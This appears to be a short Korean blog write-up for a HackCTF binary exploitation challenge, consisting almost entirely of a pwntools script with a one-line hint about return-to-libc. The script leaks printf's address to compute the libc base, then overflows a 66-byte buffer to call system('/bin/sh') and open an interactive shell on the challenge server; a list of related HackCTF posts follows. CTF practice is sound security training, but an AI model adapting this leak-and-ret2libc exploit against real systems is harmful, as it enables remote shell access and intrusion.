조금의 수학을 하고 RTL을 진행하면 풀린다
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3015)
libc = ELF('./libc.so.6', checksec=False)
payload = p32(0x2691F021)*4
payload += p32(0x2691F023)
r.sendline(payload)
r.recvuntil('0x')
leak = int(('0x'+ r.recv(8)), 16)
libc_base = leak - libc.sym['printf']
print(hex(libc_base))
system = libc_base + libc.sym['system']
binsh = libc_base + libc.search('/bin/sh\x00').next()
payload = 'A'*66
payload += p32(system)
payload += 'AAAA'
payload += p32(binsh)
r.sendline(payload)
r.interactive()'HackCTF' 카테고리의 다른 글
| HackCTF - Look at me (0) | 2021.11.22 |
|---|---|
| HackCTF - Beginner_Heap (0) | 2021.11.22 |
| HackCTF - Random Key (0) | 2021.11.21 |
| HackCTF - 1996 (0) | 2021.11.21 |
| HackCTF - Poet (0) | 2021.11.21 |
